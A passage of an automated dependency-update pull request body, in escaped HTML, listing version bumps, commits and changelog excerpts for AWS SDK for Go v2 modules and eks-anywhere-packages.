Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/12a971a61d5226cd72102c66b188ae4968cb9b81\"\u003e\u003ccode\u003e12a971a\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8bd8eee331c2fa1553e57d18d5dbbf1dc83820fc\"\u003e\u003ccode\u003e8bd8eee\u003c/code\u003e\u003c/a\u003e chore: add additional text to CONTRIBUTING.md (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3372\"\u003e#3372\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e4deb657ddb9c5d8ac36c335391aafb19034e9de\"\u003e\u003ccode\u003ee4deb65\u003c/code\u003e\u003c/a\u003e Release 2026-03-31\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/1f758f207351302f9f4e1a2aa4c255a75d81446b\"\u003e\u003ccode\u003e1f758f2\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.26.6...config/v1.32.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/credentials` from 1.17.7 to 1.19.14\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/d15107640a5073c5ce53dc395210858e316d5e82\"\u003e\u003ccode\u003ed151076\u003c/code\u003e\u003c/a\u003e Release 2026-04-02\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e33c9a9f67577e2dd5fcd3b15b9a8a2e83683f53\"\u003e\u003ccode\u003ee33c9a9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e06655901c88ef90432f41a7b9c92b33b4537c75\"\u003e\u003ccode\u003ee066559\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a635ee4303d8cac381be8788519a1a8bba5ccf12\"\u003e\u003ccode\u003ea635ee4\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9074b3ddace9c195f00993c8ae509bc8977a6c4c\"\u003e\u003ccode\u003e9074b3d\u003c/code\u003e\u003c/a\u003e Release 2026-04-01\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f6ad4c082d3a1995b9add26af4eb7553b13df252\"\u003e\u003ccode\u003ef6ad4c0\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/12a971a61d5226cd72102c66b188ae4968cb9b81\"\u003e\u003ccode\u003e12a971a\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/8bd8eee331c2fa1553e57d18d5dbbf1dc83820fc\"\u003e\u003ccode\u003e8bd8eee\u003c/code\u003e\u003c/a\u003e chore: add additional text to CONTRIBUTING.md (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3372\"\u003e#3372\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e4deb657ddb9c5d8ac36c335391aafb19034e9de\"\u003e\u003ccode\u003ee4deb65\u003c/code\u003e\u003c/a\u003e Release 2026-03-31\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/1f758f207351302f9f4e1a2aa4c255a75d81446b\"\u003e\u003ccode\u003e1f758f2\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.17.7...credentials/v1.19.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/feature/ec2/imds` from 1.15.3 to 1.18.21\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/CHANGELOG.md\"\u003egithub.com/aws/aws-sdk-go-v2/feature/ec2/imds's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease (2023-04-10)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/connect\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/connect/CHANGELOG.md#v1510-2023-04-10\"\u003ev1.51.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds the ability to configure an agent's routing profile to receive contacts from multiple channels at the same time via extending the UpdateRoutingProfileConcurrency, CreateRoutingProfile and DescribeRoutingProfile APIs.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/ecs\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/ecs/CHANGELOG.md#v1250-2023-04-10\"\u003ev1.25.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds support for enabling FIPS compliance on Amazon ECS Fargate tasks\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/marketplacecatalog\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/marketplacecatalog/CHANGELOG.md#v1160-2023-04-10\"\u003ev1.16.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Added three new APIs to support resource sharing: GetResourcePolicy, PutResourcePolicy, and DeleteResourcePolicy. Added new OwnershipType field to ListEntities request to let users filter on entities that are shared with them. Increased max page size of ListEntities response from 20 to 50 results.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/mediaconvert\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/mediaconvert/CHANGELOG.md#v1350-2023-04-10\"\u003ev1.35.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: AWS Elemental MediaConvert SDK now supports conversion of 608 paint-on captions to pop-on captions for SCC sources.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/omics\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/omics/CHANGELOG.md#v130-2023-04-10\"\u003ev1.3.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Remove unexpected API changes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/rekognition\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/rekognition/CHANGELOG.md#v1240-2023-04-10\"\u003ev1.24.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds support for Face Liveness APIs in Amazon Rekognition. Updates UpdateStreamProcessor to return ResourceInUseException Exception. Minor updates to API documentation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2023-04-07)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/dlm\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/dlm/CHANGELOG.md#v1150-2023-04-07\"\u003ev1.15.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eAnnouncement\u003c/strong\u003e: This release includes breaking changes for the timestamp trait on the data lifecycle management client.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Updated timestamp format for GetLifecyclePolicy API\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Correct timestamp type for data lifecycle manager.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/docdb\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/docdb/CHANGELOG.md#v1210-2023-04-07\"\u003ev1.21.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds a new parameter 'DBClusterParameterGroupName' to 'RestoreDBClusterFromSnapshot' API to associate the name of the DB cluster parameter group while performing restore.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/fsx\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/fsx/CHANGELOG.md#v1288-2023-04-07\"\u003ev1.28.8\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDocumentation\u003c/strong\u003e: Amazon FSx for Lustre now supports creating data repository associations on Persistent_1 and Scratch_2 file systems.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/lambda\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/lambda/CHANGELOG.md#v1310-2023-04-07\"\u003ev1.31.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release adds a new Lambda InvokeWithResponseStream API to support streaming Lambda function responses. The release also adds a new InvokeMode parameter to Function Url APIs to control whether the response will be streamed or buffered.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/quicksight\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/quicksight/CHANGELOG.md#v1340-2023-04-07\"\u003ev1.34.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: This release has two changes: adding the OR condition to tag-based RLS rules in CreateDataSet and UpdateDataSet; adding RefreshSchedule and Incremental RefreshProperties operations for users to programmatically configure SPICE dataset ingestions.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/redshiftdata\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/redshiftdata/CHANGELOG.md#v1193-2023-04-07\"\u003ev1.19.3\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDocumentation\u003c/strong\u003e: Update documentation of API descriptions as needed in support of temporary credentials with IAM identity.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/servicecatalog\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/servicecatalog/CHANGELOG.md#v1181-2023-04-07\"\u003ev1.18.1\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDocumentation\u003c/strong\u003e: Updates description for property\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2023-04-06)\u003c/h1\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/cloudformation\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/cloudformation/CHANGELOG.md#v1270-2023-04-06\"\u003ev1.27.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Including UPDATE_COMPLETE as a failed status for DeleteStack waiter.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/greengrassv2\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/greengrassv2/CHANGELOG.md#v1220-2023-04-06\"\u003ev1.22.0\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for SUCCEEDED value in coreDeviceExecutionStatus field. Documentation updates for Greengrass V2.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/aws-sdk-go-v2/service/proton\u003c/code\u003e: \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/blob/config/v1.18.21/service/proton/CHANGELOG.md#v1210-2023-04-06\"\u003ev1.21.0\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/fcc0f5daa41033b7a696f8cc5f53a9fc8696a274\"\u003e\u003ccode\u003efcc0f5d\u003c/code\u003e\u003c/a\u003e Release 2023-04-10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/cd750e0b2188951c525ae7917d47ae9e2d013a1b\"\u003e\u003ccode\u003ecd750e0\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/1bc2f0514c73be727d3536e829fef18911bb45ae\"\u003e\u003ccode\u003e1bc2f05\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b964f5ca3ccae40ef8d7a56fd1b1ad040764b5fa\"\u003e\u003ccode\u003eb964f5c\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/fd6901588c6d13a7889787328d0628134afd14cc\"\u003e\u003ccode\u003efd69015\u003c/code\u003e\u003c/a\u003e fix APIGW exports nullability exceptions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/fae239abb72a392c50e05aa567b2e5cc2b93a10b\"\u003e\u003ccode\u003efae239a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2089\"\u003e#2089\u003c/a\u003e from aws/auditAccessibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/acf33a2872dbd9d3547842f38ccd38863048c121\"\u003e\u003ccode\u003eacf33a2\u003c/code\u003e\u003c/a\u003e Update aws-sdk-go-v2's comment codegened from Smithy Go's updated document sm...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/27360c189034eb456ebe7458bb8e019bc45d686c\"\u003e\u003ccode\u003e27360c1\u003c/code\u003e\u003c/a\u003e fix APIGW exports nullability exceptions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/30383d567f67c2a67b2b40a462a8c284c49d1796\"\u003e\u003ccode\u003e30383d5\u003c/code\u003e\u003c/a\u003e Release 2023-04-07\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/352f89c2d23ec6249a699c732ba5c9ae050f833f\"\u003e\u003ccode\u003e352f89c\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.15.3...config/v1.18.21\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/ec2` from 1.167.1 to 1.296.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e4deb657ddb9c5d8ac36c335391aafb19034e9de\"\u003e\u003ccode\u003ee4deb65\u003c/code\u003e\u003c/a\u003e Release 2026-03-31\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/1f758f207351302f9f4e1a2aa4c255a75d81446b\"\u003e\u003ccode\u003e1f758f2\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/ba7e432545fa3203d98f593b2aceaba66c02db7a\"\u003e\u003ccode\u003eba7e432\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/607cb0afad6e6a655a356be54f9fdec5cc558a80\"\u003e\u003ccode\u003e607cb0a\u003c/code\u003e\u003c/a\u003e Release 2026-03-30\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a44005fd4a2e2b7308c0346da970890757aaeda5\"\u003e\u003ccode\u003ea44005f\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/dbbd8465f03f1931d85d38af45f18362cbc4c469\"\u003e\u003ccode\u003edbbd846\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5b5c3f960e98cf024a8b7d6a6a8f0a1452e028fa\"\u003e\u003ccode\u003e5b5c3f9\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;drop service/internal/benchmark (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3368\"\u003e#3368\u003c/a\u003e)\u0026quot; (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3369\"\u003e#3369\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/7ca3f9d52a718e4be3a78be0d05e6437ae362e20\"\u003e\u003ccode\u003e7ca3f9d\u003c/code\u003e\u003c/a\u003e drop service/internal/benchmark (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3368\"\u003e#3368\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/338088bc3ce801d773863578da6a0a835d6012af\"\u003e\u003ccode\u003e338088b\u003c/code\u003e\u003c/a\u003e Release 2026-03-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f0e5f3dc09ddb548bccfc11b297229839516bff9\"\u003e\u003ccode\u003ef0e5f3d\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/service/ec2/v1.167.1...service/ec2/v1.296.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/service/ecr` from 1.27.4 to 1.56.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5a964704cb2640ed57a74b9b37a53dcda7b6b7dd\"\u003e\u003ccode\u003e5a96470\u003c/code\u003e\u003c/a\u003e Release 2024-12-19\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/653aa807b912e104f5e1e84e0510b4dffd76c751\"\u003e\u003ccode\u003e653aa80\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/d02b239e896c5791e295c9a30a5281f56a8f7c39\"\u003e\u003ccode\u003ed02b239\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/698d709c21bc7922489aaba8c8207c9d7253c2fe\"\u003e\u003ccode\u003e698d709\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/885de40869f9bcee29ad11d60967aa0f1b571d46\"\u003e\u003ccode\u003e885de40\u003c/code\u003e\u003c/a\u003e Fix improper use of Printf-style functions (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/2934\"\u003e#2934\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/858298a55393392fb161c5bd0ae3b9c5251996bf\"\u003e\u003ccode\u003e858298a\u003c/code\u003e\u003c/a\u003e Release 2024-12-18\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f58264af808a255782999422056bccb06552dcbd\"\u003e\u003ccode\u003ef58264a\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/df31082d87044a000a1524dbb654651f32713e10\"\u003e\u003ccode\u003edf31082\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/346690ed8f5b974ab26532aa93d5fa92a58d3571\"\u003e\u003ccode\u003e346690e\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/45154546e09b48505c8798f7e5f3846ee1e0453a\"\u003e\u003ccode\u003e4515454\u003c/code\u003e\u003c/a\u003e Release 2024-12-17\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/config/v1.27.4...service/ssm/v1.56.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/eks-anywhere-packages` from 0.4.5 to 0.4.15\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/eks-anywhere-packages/releases\"\u003egithub.com/aws/eks-anywhere-packages's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.14.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd registry mirror support for curated packages\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eCLI\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eNew Command: \u003ccode\u003eeksctl anywhere copy packages\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere/pull/4420\"\u003eaws/eks-anywhere#4420\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.13.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for Create Namespace during package creation.\u003c/li\u003e\n\u003cli\u003eAdded Harbor support for import/download images command to EKS-A Packages.\u003c/li\u003e\n\u003cli\u003eFixed bug where PackageBundle version was incremented without changes sometimes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded Prometheus Package\u003c/li\u003e\n\u003cli\u003eAdded New Helm Chart CRD Package for Emissary for improved upgrade flow, and support multiple instances of the package.\u003c/li\u003e\n\u003cli\u003eUpdated Emissary Package to version 3.3.0\u003c/li\u003e\n\u003cli\u003eUpdated Metallb Package to version to 0.13.7\nUpdated ADOT Package to version 0.23.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.12.0\u003c/h2\u003e\n\u003ch2\u003eGeneral\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMoved to Go version 1.18\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd EKS Anywhere Packages support for remote management on workload clusters.\u003c/li\u003e\n\u003cli\u003eFixed Update Available not showing on PackageBundle list.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded New Helm Chart CRD Package for Metallb for improved upgrade flow\u003c/li\u003e\n\u003cli\u003eAdded Cert Manager Package\u003c/li\u003e\n\u003cli\u003eAdded AWS Distro for OpenTelemetry Package (ADOT)\u003c/li\u003e\n\u003cli\u003eAdded Metrics Server Package\u003c/li\u003e\n\u003cli\u003eAdded Cluster Autoscaler Package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.11.0\u003c/h2\u003e\n\u003ch2\u003eController\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded webhook to provide schema validation for packages\u003c/li\u003e\n\u003cli\u003eAdded support for gated packages\u003c/li\u003e\n\u003cli\u003eAdded active bundle validation for packagebundles\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eCLI\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSupport for configurations from \u003ccode\u003egenerate packages\u003c/code\u003e has been removed\u003c/li\u003e\n\u003cli\u003eSupport for gated packages\u003c/li\u003e\n\u003cli\u003eRemoved feature flag from curated packages installation\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePackages\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded Emmisary package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.10.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eController\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for configurations, and images in PackageBundle.\u003c/li\u003e\n\u003cli\u003eRemove registry from PackageBundle and updates sourceRegistry during cluster creation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/afbcc9b196cf4d5988ddfb8f0133a2c1821821eb\"\u003e\u003ccode\u003eafbcc9b\u003c/code\u003e\u003c/a\u003e Faster retries during initial ecr credential injection (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1262\"\u003e#1262\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca 